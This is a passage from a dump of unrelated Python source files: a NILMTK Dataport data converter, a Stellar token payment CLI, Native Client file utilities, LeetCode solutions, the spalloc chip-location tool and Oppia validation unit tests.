sql_query = (sql_query + '(SELECT DISTINCT dataid' +\n ' FROM \"' + database_schema + '\".' + table +\n ') UNION ')\n sql_query = sql_query[:-7]\n sql_query = (sql_query + ' ORDER BY dataid')\n buildings_to_load = pd.read_sql(sql_query, conn)['dataid'].tolist()\n\n # for each user specified building or all buildings in database\n for building_id in buildings_to_load:\n print(\"Loading building {:d} @ {}\"\n .format(building_id, datetime.datetime.now()))\n sys.stdout.flush()\n\n # create new list of chunks for concatenating later\n dataframe_list = []\n\n # for each table of 1 month data\n for database_table in database_tables:\n print(\" Loading table {:s}\".format(database_table))\n sys.stdout.flush()\n\n # get buildings present in electricity_egauge_minutes table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE egauge_min_time IS NOT NULL' +\n ' ORDER BY dataid')\n\n buildings_in_table = pd.read_sql(sql_query,\n conn)['dataid'].tolist()\n if building_id in buildings_in_table:\n # get first and last timestamps for this\n # house in electricity_egauge_minutes table\n sql_query = ('SELECT MIN(egauge_min_time) AS minlocalminute,' +\n ' MAX(egauge_max_time) AS maxlocalminute' +\n ' FROM university.metadata' +\n ' WHERE dataid=' + str(building_id))\n\n range = pd.read_sql(sql_query, conn)\n\n first_timestamp_in_table = range['minlocalminute'][0]\n last_timestamp_in_table = range['maxlocalminute'][0]\n\n # get requested start and end and localize them\n requested_start = None\n requested_end = None\n database_timezone = 'US/Central'\n if periods_to_load:\n if periods_to_load[building_id][0]:\n requested_start = pd.Timestamp(periods_to_load[building_id][0])\n requested_start = requested_start.tz_localize(database_timezone)\n if periods_to_load[building_id][1]:\n requested_end = pd.Timestamp(periods_to_load[building_id][1])\n requested_end = requested_end.tz_localize(database_timezone)\n\n # check user start is not after end\n if requested_start > requested_end:\n print('requested end is before requested start')\n sys.stdout.flush()\n else:\n # clip data to smallest range\n if requested_start:\n start = max(requested_start, first_timestamp_in_table)\n else:\n start = first_timestamp_in_table\n if requested_end:\n end = min(requested_end, last_timestamp_in_table)\n else:\n end = last_timestamp_in_table\n\n # download data in chunks\n chunk_start = start\n chunk_size = datetime.timedelta(10) # 1 day\n while chunk_start < end:\n chunk_end = chunk_start + chunk_size\n if chunk_end > end:\n chunk_end = end\n # subtract 1 second so end is exclusive\n chunk_end = chunk_end - datetime.timedelta(0, 1)\n\n # query power data for all channels\n format = '%Y-%m-%d %H:%M:%S'\n sql_query = ('SELECT *' +\n ' FROM \"' + database_schema + '\".' + user_selected_table +\n ' WHERE dataid=' + str(building_id) +\n 'and \"' + timestamp_map[user_selected_table] + '\" between ' +\n \"'\" + chunk_start.strftime(format) + \"'\" +\n \" and \" +\n \"'\" + chunk_end.strftime(format) +\n \"' ORDER BY \"+timestamp_map[user_selected_table]\n )\n chunk_dataframe = pd.read_sql(sql_query, conn)\n # nilmtk requires building indices to start at 1\n nilmtk_building_id = buildings_to_load.index(building_id) + 1\n # convert to nilmtk-df and save to disk\n nilmtk_dataframe = _dataport_dataframe_to_hdf(\n chunk_dataframe, store,\n nilmtk_building_id,\n building_id,\n timestamp_map[user_selected_table],\n metadata_dir\n )\n\n # print progress\n print(' ' + str(chunk_start) + ' -> ' +\n str(chunk_end) + ': ' +\n str(len(chunk_dataframe.index)) + ' rows')\n sys.stdout.flush()\n\n # append all chunks into list for csv writing\n # dataframe_list.append(chunk_dataframe)\n\n # move on to next chunk\n chunk_start = chunk_start + chunk_size\n\n # saves all chunks in list to csv\n # if len(dataframe_list) > 0:\n # dataframe_concat = pd.concat(dataframe_list)\n # dataframe_concat.to_csv(output_directory + str(building_id) + '.csv')\n\n store.close()\n conn.close()\n\n # write yaml to hdf5\n # dataset.yaml and meter_devices.yaml are static, building<x>.yaml are dynamic\n convert_yaml_to_hdf5(metadata_dir, hdf_filename)\n\n # remote the temporary dir when finished\n shutil.rmtree(tmp_dir)\n\n\ndef _dataport_dataframe_to_hdf(dataport_dataframe,\n store,\n nilmtk_building_id,\n dataport_building_id,\n timestamp_name,\n metadata_dir):\n local_dataframe = dataport_dataframe.copy()\n\n # remove timezone information to avoid append errors\n local_dataframe[timestamp_name] = pd.DatetimeIndex([i.replace(tzinfo=None)\n for i in local_dataframe[timestamp_name]])\n # set timestamp as frame index\n local_dataframe = local_dataframe.set_index(timestamp_name)\n\n # set timezone\n local_dataframe = local_dataframe.tz_localize('US/Central')\n # remove timestamp column from dataframe\n feeds_dataframe = local_dataframe.drop('dataid', axis=1)\n # Column names for dataframe\n column_names = [('power', 'active')]\n # convert from kW to W\n feeds_dataframe = feeds_dataframe.mul(1000)\n # building metadata\n building_metadata = {}\n building_metadata['instance'] = nilmtk_building_id\n building_metadata['original_name'] = int(dataport_building_id) # use python int\n building_metadata['elec_meters'] = {}\n building_metadata['appliances'] = []\n\n # initialise dict of instances of each appliance type\n instance_counter = {}\n\n meter_id = 1\n for column in feeds_dataframe.columns:\n if feeds_dataframe[column].notnull().sum() > 0 and not column in feed_ignore:\n\n # convert timeseries into dataframe\n feed_dataframe = pd.DataFrame(feeds_dataframe[column])\n\n # set column names\n feed_dataframe.columns = pd.MultiIndex.from_tuples(column_names)\n\n # Modify the column labels to reflect the power measurements recorded.\n feed_dataframe.columns.set_names(LEVEL_NAMES, inplace=True)\n\n key = Key(building=nilmtk_building_id, meter=meter_id)\n\n # store dataframe\n store.put(str(key), feed_dataframe, format='table', append=True)\n store.flush()\n\n # elec_meter metadata\n if column == 'use':\n meter_metadata = {'device_model': 'eGauge',\n 'site_meter': True}\n else:\n meter_metadata = {'device_model': 'eGauge',\n 'submeter_of': 0}\n building_metadata['elec_meters'][meter_id] = meter_metadata\n # appliance metadata\n if column != 'use':\n # original name and meter id\n appliance_metadata = {'original_name': column,\n 'meters': [meter_id]}\n # appliance type and room if available\n appliance_metadata.update(feed_mapping[column])\n # appliance instance number\n if instance_counter.get(appliance_metadata['type']) == None:\n instance_counter[appliance_metadata['type']] = 0\n instance_counter[appliance_metadata['type']] += 1\n appliance_metadata['instance'] = instance_counter[appliance_metadata['type']]\n building_metadata['appliances'].append(appliance_metadata)\n\n meter_id += 1\n\n # write building yaml to file\n building = 'building{:d}'.format(nilmtk_building_id)\n yaml_full_filename = join(metadata_dir, building + '.yaml')\n with open(yaml_full_filename, 'w') as outfile:\n outfile.write(yaml.dump(building_metadata))\n\n return 0\n"} {"ext": "py", "sha": "1a30c55d62d8a77272434ab0875bbada042fc988", "content": "from unittest import TestCase\n\nfrom nba_data.data.box_scores import GameBoxScore\n\n\nclass TestBoxScore(TestCase):\n def test_instantiation(self):\n test_box_score = GameBoxScore(game_id=\"bae\", player_box_scores=[], team_box_scores=[])\n self.assertIsNotNone(test_box_score)\n self.assertEqual(test_box_score.game_id, \"bae\")\n self.assertEqual(test_box_score.player_box_scores, [])\n self.assertEqual(test_box_score.team_box_scores, [])\n"} {"ext": "py", "sha": "1a30c560e3551736dc863a833eccb11ca158a08e", "content": "#!/usr/bin/env python\nimport urllib\nfrom decimal import Decimal\nfrom getpass import getpass\n\nimport click\nfrom stellar_base import exceptions\nfrom stellar_base.address import Address\nfrom stellar_base.builder import Builder\nfrom stellar_base.keypair import Keypair\n\nfrom config import configs\nfrom validate import validate\n\n\n@click.command()\n@click.argument('target_address')\n@click.argument('amount')\n@click.option('--network', default='TESTNET', type=click.Choice(['TESTNET', 'PUBLIC']))\n@click.option('--source_secret', prompt=True, hide_input=True)\ndef payment(target_address: str, amount: str, network, source_secret):\n config = configs[network]\n src_address = Keypair.from_seed(source_secret).address().decode()\n builder = Builder(secret=source_secret, horizon_uri=config['HORIZON_URL'], network=network)\n builder.append_payment_op(destination=target_address, asset_code='HOT',\n asset_issuer=config['ISSUER_HOT'], amount=amount)\n builder.sign()\n print(\"############### TX #################\")\n print('Payment {} HOT from {} to {}'.format(amount, src_address, target_address))\n print('Network: {}'.format(network))\n print('Sequence: {}'.format(builder.sequence))\n print('Hash: {}'.format(builder.hash()))\n print(\"#########################################\")\n click.confirm('Correct?', abort=True)\n print('Submitting...')\n builder.submit()\n print('success')\n return True\n\nif __name__ == '__main__':\n payment()\n"} {"ext": "py", "sha": "1a30c62d73df388e8abad757f3574701663a0b82", "content": "#!/usr/bin/python\n# Copyright (c) 2012 The Native Client Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Convience file system related operations.\"\"\"\n\n\nimport os\nimport shutil\nimport sys\nimport tempfile\n\nimport platform\nimport time\n\n\ndef AtomicWriteFile(data, filename):\n \"\"\"Write a file atomically.\n\n NOTE: Not atomic on Windows!\n Args:\n data: String to write to the file.\n filename: Filename to write.\n \"\"\"\n filename = os.path.abspath(filename)\n handle, temp_file = tempfile.mkstemp(\n prefix='atomic_write', suffix='.tmp',\n dir=os.path.dirname(filename))\n fh = os.fdopen(handle, 'wb')\n fh.write(data)\n fh.close()\n # Window's can't move into place atomically, delete first.\n if sys.platform in ['win32', 'cygwin']:\n try:\n os.remove(filename)\n except OSError:\n pass\n os.rename(temp_file, filename)\n\n\ndef WriteFile(data, filename):\n \"\"\"Write a file in one step.\n\n Args:\n data: String to write to the file.\n filename: Filename to write.\n \"\"\"\n fh = open(filename, 'wb')\n fh.write(data)\n fh.close()\n\n\ndef ReadFile(filename):\n \"\"\"Read a file in one step.\n\n Args:\n filename: Filename to read.\n Returns:\n String containing complete file.\n \"\"\"\n fh = open(filename, 'rb')\n data = fh.read()\n fh.close()\n return data\n\n\nclass ExecutableNotFound(Exception):\n pass\n\n\ndef Which(command, paths=None, require_executable=True):\n \"\"\"Find the absolute path of a command in the current PATH.\n\n Args:\n command: Command name to look for.\n paths: Optional paths to search.\n Returns:\n Absolute path of the command (first one found),\n or default to a bare command if nothing is found.\n \"\"\"\n if paths is None:\n paths = os.environ.get('PATH', '').split(os.pathsep)\n exe_suffixes = ['']\n if sys.platform == 'win32':\n exe_suffixes += ['.exe']\n for p in paths:\n np = os.path.abspath(os.path.join(p, command))\n for suffix in exe_suffixes:\n full_path = np + suffix\n if (os.path.isfile(full_path) and\n (not require_executable or os.access(full_path, os.X_OK))):\n return full_path\n raise ExecutableNotFound('Unable to find: ' + command)\n\n\ndef MakeDirectoryIfAbsent(path):\n \"\"\"Create a directory if it doesn't already exist.\n\n Args:\n path: Directory to create.\n \"\"\"\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef MakeParentDirectoryIfAbsent(path):\n \"\"\"Creates a directory for the parent if it doesn't already exist.\n\n Args:\n path: Path of child where parent directory should be created for.\n \"\"\"\n MakeDirectoryIfAbsent(os.path.dirname(path))\n\n\ndef RemoveDirectoryIfPresent(path):\n \"\"\"Remove a directory if it exists.\n\n Args:\n path: Directory to remove.\n \"\"\"\n # On Windows, attempts to remove read-only files get Error 5. This\n # error handler fixes the permissions and retries the removal.\n def onerror_readonly(func, path, exc_info):\n import stat\n if not os.access(path, os.W_OK):\n os.chmod(path, stat.S_IWUSR)\n func(path)\n\n if os.path.exists(path):\n shutil.rmtree(path, onerror=onerror_readonly)\n\n\ndef CopyTree(src, dst):\n \"\"\"Recursively copy the items in the src directory to the dst directory.\n\n Unlike shutil.copytree, the destination directory and any subdirectories and\n files may exist. Existing directories are left untouched, and existing files\n are removed and copied from the source using shutil.copy2. It is also not\n symlink-aware.\n\n Args:\n src: Source. Must be an existing directory.\n dst: Destination directory. If it exists, must be a directory. Otherwise it\n will be created, along with parent directories.\n \"\"\"\n if not os.path.isdir(dst):\n os.makedirs(dst)\n for root, dirs, files in os.walk(src):\n relroot = os.path.relpath(root, src)\n dstroot = os.path.join(dst, relroot)\n for d in dirs:\n dstdir = os.path.join(dstroot, d)\n if not os.path.isdir(dstdir):\n os.mkdir(dstdir)\n for f in files:\n dstfile = os.path.join(dstroot, f)\n if os.path.isfile(dstfile):\n os.remove(dstfile)\n shutil.copy2(os.path.join(root, f), dstfile)\n\n\ndef MoveAndMergeDirTree(src_dir, dest_dir):\n \"\"\"Moves everything from a source directory to a destination directory.\n\n This is different from shutil's move implementation in that it only operates\n on directories, and if the destination directory exists, it will move the\n contents into the directory and merge any existing directories.\n\n Args:\n src_dir: Source directory which files should be moved from.\n dest_dir: Destination directory where files should be moved and merged to.\n \"\"\"\n if not os.path.isdir(src_dir):\n raise OSError('MoveAndMergeDirTree can only operate on directories.')\n\n if not os.path.exists(dest_dir):\n # Simply move the directory over if destination doesn't exist.\n MakeParentDirectoryIfAbsent(dest_dir)\n os.rename(src_dir, dest_dir)\n else:\n # Merge each item if destination directory exists.\n for dir_item in os.listdir(src_dir):\n source_item = os.path.join(src_dir, dir_item)\n destination_item = os.path.join(dest_dir, dir_item)\n if os.path.exists(destination_item):\n if os.path.isdir(destination_item) and os.path.isdir(source_item):\n # Merge the sub-directories together if they are both directories.\n MoveAndMergeDirTree(source_item, destination_item)\n elif os.path.isfile(destination_item) and os.path.isfile(source_item):\n # Overwrite the file if they are both files.\n os.unlink(destination_item)\n os.rename(source_item, destination_item)\n else:\n raise OSError('Cannot move directory tree, mismatching types.'\n ' Source - %s. Destination - %s' %\n (source_item, destination_item))\n else:\n os.rename(source_item, destination_item)\n\n # Remove the directory once all the contents have been moved\n os.rmdir(src_dir)\n\n\ndef Retry(op, *args):\n # Windows seems to be prone to having commands that delete files or\n # directories fail. We currently do not have a complete understanding why,\n # and as a workaround we simply retry the command a few times.\n # It appears that file locks are hanging around longer than they should. This\n # may be a secondary effect of processes hanging around longer than they\n # should. This may be because when we kill a browser sel_ldr does not exit\n # immediately, etc.\n # Virus checkers can also accidently prevent files from being deleted, but\n # that shouldn't be a problem on the bots.\n if platform.IsWindows():\n count = 0\n while True:\n try:\n op(*args)\n break\n except Exception:\n sys.stdout.write('FAILED: %s %s\\n' % (op.__name__, repr(args)))\n count += 1\n if count < 5:\n sys.stdout.write('RETRY: %s %s\\n' % (op.__name__, repr(args)))\n time.sleep(pow(2, count))\n else:\n # Don't mask the exception.\n raise\n else:\n op(*args)\n\n\ndef MoveDirCleanly(src, dst):\n RemoveDir(dst)\n MoveDir(src, dst)\n\n\ndef MoveDir(src, dst):\n Retry(shutil.move, src, dst)\n\n\ndef RemoveDir(path):\n if os.path.exists(path):\n Retry(shutil.rmtree, path)\n\n\ndef RemoveFile(path):\n if os.path.exists(path):\n Retry(os.unlink, path)\n"} {"ext": "py", "sha": "1a30c632e40550975854418757821a570b2a722c", "content": "__author__ = \"Thomas Spycher, Philipp Spinnler\"\n__copyright__ = \"Copyright 2013, Zerodine GmbH (zerodine.com) \"\n__credits__ = [\"Thomas Spycher\", \"Philipp Spinnler\"]\n__license__ = \"Apache-2.0\"\n__maintainer__ = \"Thomas Spycher\"\n__email__ = \"me@tspycher.com\"\n__status__ = \"Development\"\n\n\nfrom indexcontroller import IndexController\nfrom lookupcontroller import LookupController\nfrom addcontroller import AddController\nfrom reconcontroller import ReconController"} {"ext": "py", "sha": "1a30c6b22bfdf091c8fb98c1228153fa497b8362", "content": "class Solution:\n def myAtoi(self, string: str) -> int:\n\n string = string.strip()\n ans = 0\n sign = \"+\"\n index = 0\n\n if not string:\n return 0\n\n if string[0] != \"+\" and string[0] != \"-\" and string[0].isdigit() is False:\n return 0\n\n if string[0] == \"-\":\n sign = \"-\"\n index += 1\n elif string[0] == \"+\":\n index += 1\n\n while index < len(string):\n\n if string[index].isdigit() is False:\n ans = ans if sign == \"+\" else - ans\n\n if ans < -2 ** 31:\n return -2 ** 31\n elif ans > 2 ** 31 - 1:\n return 2 ** 31 - 1\n else:\n return ans\n\n ans = 10 * ans + int(string[index])\n index += 1\n\n ans = ans if sign == \"+\" else -ans\n\n if ans < -2 ** 31:\n return -2 ** 31\n elif ans > 2 ** 31 - 1:\n return 2 ** 31 - 1\n else:\n return ans\n"} {"ext": "py", "sha": "1a30c6bd92450c13df17b6d8d04efe99dd7ce850", "content": "\"\"\"Command-line tool to find out where a particular chip or board resides.\n\nThe ``spalloc-where-is`` command allows you to query boards by coordinate, by\nphysical location, by chip or by job. In response to a query, a standard set of\ninformation is displayed as shown in the example below::\n\n $ spalloc-where-is --job-chip 24 14, 3\n Machine: my-machine\n Physical Location: Cabinet 2, Frame 4, Board 7\n Board Coordinate: (3, 4, 0)\n Machine Chip Coordinates: (38, 51)\n Coordinates within board: (2, 3)\n Job using board: 24\n Coordinates within job: (14, 3)\n\nIn this example we ask, 'where is chip (14, 3) in job 24'? We discover that:\n\n* The chip is the machine named 'my-machine' on the board in cabinet 2, frame\n 4, board 7.\n* This board's logical board coordinates are (3, 4, 0). These logical\n coordinates may be used to specifically request this board from Spalloc in\n the future.\n* If 'my-machine' were booted as a single large machine, the chip we queried\n would be chip (38, 51). This may be useful for cross-referencing with\n diagrams produced by SpiNNer_.\n* The chip in question is chip (2, 3) its board. This may be useful when\n reporting faulty chips/replacing boards..\n* The job currently running on the board has ID 24. Obviously in this example\n we already knew this but this may be useful when querying by board.\n* Finally, we're told that the queried chip has the coordinates (14, 3) in the\n machine allocated to job 24. Again, this information may be more useful when\n querying by board.\n\n.. _SpiNNer: https://github.com/SpiNNakerManchester/SpiNNer\n\nTo query by logical board coordinate::\n\n spalloc-where-is --board MACHINE X Y Z\n\nTo query by physical board location::\n\n spalloc-where-is --physical MACHINE CABINET FRAME BOARD\n\nTo query by chip coordinate (as if the machine were booted as one large\nmachine)::\n\n spalloc-where-is --chip MACHINE X Y\n\nTo query by chip coordinate of chips allocated to a job::\n\n spalloc-where-is --job-chip JOB_ID X Y\n\"\"\"\nimport sys\nimport argparse\n\nfrom collections import OrderedDict\n\nfrom spalloc import config\nfrom spalloc import __version__, ProtocolClient, ProtocolTimeoutError\nfrom spalloc.term import render_definitions\n\n\n# The acceptable range of server version numbers\nVERSION_RANGE_START = (0, 3, 0)\nVERSION_RANGE_STOP = (2, 0, 0)\n\n\ndef main(argv=None):\n cfg = config.read_config()\n\n parser = argparse.ArgumentParser(\n description=\"Find out the location (physical or logical) \"\n \"of a chip or board.\")\n\n parser.add_argument(\"--version\", \"-V\", action=\"version\",\n version=__version__)\n\n control_args = parser.add_mutually_exclusive_group(required=True)\n control_args.add_argument(\"--board\", \"-b\", \"--logical\", \"-l\", nargs=4,\n metavar=(\"MACHINE\", \"X\", \"Y\", \"Z\"),\n help=\"specify the logical board coordinate\")\n control_args.add_argument(\"--physical\", \"-p\", nargs=4,\n metavar=(\"MACHINE\", \"CABINET\", \"FRAME\", \"BOARD\"),\n help=\"specify a board's physical location\")\n control_args.add_argument(\"--chip\", \"-c\", nargs=3,\n metavar=(\"MACHINE\", \"X\", \"Y\"),\n help=\"specify a board by chip coordinates (as \"\n \"if the whole machine is being used)\")\n control_args.add_argument(\"--job-chip\", \"-j\", nargs=3,\n metavar=(\"JOB_ID\", \"X\", \"Y\"),\n help=\"specify the chip coordinates of a chip \"\n \"within a job's boards\")\n\n server_args = parser.add_argument_group(\"spalloc server arguments\")\n\n server_args.add_argument(\"--hostname\", \"-H\", default=cfg[\"hostname\"],\n help=\"hostname or IP of the spalloc server \"\n \"(default: %(default)s)\")\n server_args.add_argument(\"--port\", \"-P\", default=cfg[\"port\"],\n type=int,\n help=\"port number of the spalloc server \"\n \"(default: %(default)s)\")\n server_args.add_argument(\"--timeout\", default=cfg[\"timeout\"],\n type=float, metavar=\"SECONDS\",\n help=\"seconds to wait for a response \"\n \"from the server (default: %(default)s)\")\n\n args = parser.parse_args(argv)\n\n # Fail if server not specified\n if args.hostname is None:\n parser.error(\"--hostname of spalloc server must be specified\")\n\n client = ProtocolClient(args.hostname, args.port)\n try:\n # Connect to server and ensure compatible version\n client.connect()\n version = tuple(\n map(int, client.version(timeout=args.timeout).split(\".\")))\n if not (VERSION_RANGE_START <= version < VERSION_RANGE_STOP):\n sys.stderr.write(\"Incompatible server version ({}).\\n\".format(\n \".\".join(map(str, version))))\n return 2\n\n # Work out what the user asked for\n try:\n show_board_chip = False\n if args.board:\n machine, x, y, z = args.board\n where_is_kwargs = {\n \"machine\": machine,\n \"x\": int(x),\n \"y\": int(y),\n \"z\": int(z),\n }\n elif args.physical:\n machine, c, f, b = args.physical\n where_is_kwargs = {\n \"machine\": machine,\n \"cabinet\": int(c),\n \"frame\": int(f),\n \"board\": int(b),\n }\n elif args.chip:\n machine, x, y = args.chip\n where_is_kwargs = {\n \"machine\": machine,\n \"chip_x\": int(x),\n \"chip_y\": int(y),\n }\n show_board_chip = True\n elif args.job_chip:\n job_id, x, y = args.job_chip\n where_is_kwargs = {\n \"job_id\": int(job_id),\n \"chip_x\": int(x),\n \"chip_y\": int(y),\n }\n show_board_chip = True\n except ValueError as e:\n parser.error(\"Error: {}\".format(e))\n\n # Ask the server\n location = client.where_is(**where_is_kwargs)\n if location is None:\n sys.stderr.write(\"No boards at the specified location.\\n\")\n return 4\n else:\n out = OrderedDict()\n out[\"Machine\"] = location[\"machine\"]\n out[\"Physical location\"] = \"Cabinet {}, Frame {}, Board {}\".format(\n *location[\"physical\"])\n out[\"Board coordinate\"] = tuple(location[\"logical\"])\n out[\"Machine chip coordinates\"] = tuple(location[\"chip\"])\n if show_board_chip:\n out[\"Coordinates within board\"] = tuple(location[\"board_chip\"])\n out[\"Job using board\"] = location[\"job_id\"]\n if location[\"job_id\"]:\n out[\"Coordinates within job\"] = tuple(location[\"job_chip\"])\n\n print(render_definitions(out))\n return 0\n\n except (IOError, OSError, ProtocolTimeoutError) as e:\n sys.stderr.write(\"Error communicating with server: {}\\n\".format(e))\n return 1\n finally:\n client.close()\n\n\nif __name__ == \"__main__\": # pragma: no cover\n sys.exit(main())\n"} {"ext": "py", "sha": "1a30c7911b5f3552849125ccf446ef0d8bd4b9b1", "content": "# [1081] 不同字符的最小子序列\n\n# https://leetcode-cn.com/problems/smallest-subsequence-of-distinct-characters/description/\n\n# * algorithms\n# * Medium (53.88%)\n# * Total Accepted: 6.7K\n# * Total Submissions: 12.5K\n# * Testcase Example: '\"bcabc\"'\n\n# 返回字符串 text 中按字典序排列最小的子序列,该子序列包含 text 中所有不同字符一次。\n\n#\n\n# 示例 1:\n\n# 输入:\"cdadabcc\"\n# 输出:\"adbc\"\n\n\n# 示例 2:\n\n# 输入:\"abcd\"\n# 输出:\"abcd\"\n\n\n# 示例 3:\n\n# 输入:\"ecbacba\"\n# 输出:\"eacb\"\n\n\n# 示例 4:\n\n# 输入:\"leetcode\"\n# 输出:\"letcod\"\n\n\n#\n\n# 提示:\n\n\n# \t1 <= text.length <= 1000\n# \ttext 由小写英文字母组成\n\n\n#\n\n# 注意:本题目与 316 https://leetcode-cn.com/problems/remove-duplicate-letters/ 相同\n\nimport collections\n\n\nclass Solution(object):\n def smallestSubsequence(self, text):\n seen = set()\n stack = []\n # 记录每个字母还可以删除几次,也可以保存每个字符最右边的位置用于判断\n remain_counter = collections.Counter(text)\n for c in text:\n # 每个字母只能出现一次,之前出现过的,现在没有出现过的意义,这是一个单调递增的栈\n if c not in seen:\n # 栈顶太大了,而且后面还有\n while stack and stack[-1] > c and remain_counter[stack[-1]] > 0:\n seen.discard(stack.pop())\n stack.append(c)\n seen.add(c)\n remain_counter[c] -= 1\n return \"\".join(stack)\n"} {"ext": "py", "sha": "1a30c85355b930c93afd047e14ad7652370579ee", "content": "# coding: utf-8\n#\n# Copyright 2021 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unit tests for jobs.transforms.config_validation.\"\"\"\n\nfrom __future__ import absolute_import # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals # pylint: disable=import-only-modules\n\nfrom core.domain import platform_parameter_domain as parameter_domain\nfrom core.platform import models\nfrom jobs import job_test_utils\nfrom jobs.transforms import config_validation\nfrom jobs.types import base_validation_errors\n\nimport apache_beam as beam\n\n(base_models, config_models) = models.Registry.import_models(\n [models.NAMES.base_model, models.NAMES.config])\n\n\nclass ValidateConfigPropertySnapshotMetadataModelTests(\n job_test_utils.PipelinedTestBase):\n\n def test_validate_change_domain_implemented(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{\n 'cmd': base_models.VersionedModel.CMD_DELETE_COMMIT}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [])\n\n def test_config_property_change_object_with_missing_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'invalid': 'data'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'invalid': 'data'},\n 'Missing cmd key in change dict')\n ])\n\n def test_config_property_change_object_with_invalid_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'invalid'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'invalid'},\n 'Command invalid is not allowed')\n ])\n\n def test_config_property_change_object_with_missing_attribute_in_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'change_property_value'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'change_property_value'},\n 'The following required attributes are missing: '\n 'new_value')\n ])\n\n def test_config_property_change_object_with_extra_attribute_in_cmd(self):\n commit_dict = {\n 'cmd': 'change_property_value',\n 'new_value': 'new_value',\n 'invalid': 'invalid'\n }\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[commit_dict])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n commit_dict,\n 'The following extra attributes are present: invalid')\n ])\n\n\nclass ValidatePlatformParameterSnapshotMetadataModelTests(\n job_test_utils.PipelinedTestBase):\n\n CMD_EDIT_RULES = parameter_domain.PlatformParameterChange.CMD_EDIT_RULES\n\n def test_validate_change_domain_implemented(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{\n 'cmd': base_models.VersionedModel.CMD_DELETE_COMMIT}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [])\n\n def test_param_change_object_with_missing_cmd_raises_exception(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'invalid': 'data'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'invalid': 'data'},\n 'Missing cmd key in change dict')\n ])\n\n def test_param_change_object_with_invalid_cmd_raises_exception(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'invalid'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'invalid'},\n 'Command invalid is not allowed')\n ])\n\n def test_param_change_object_missing_attribute_in_cmd_raises_exception(\n self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n 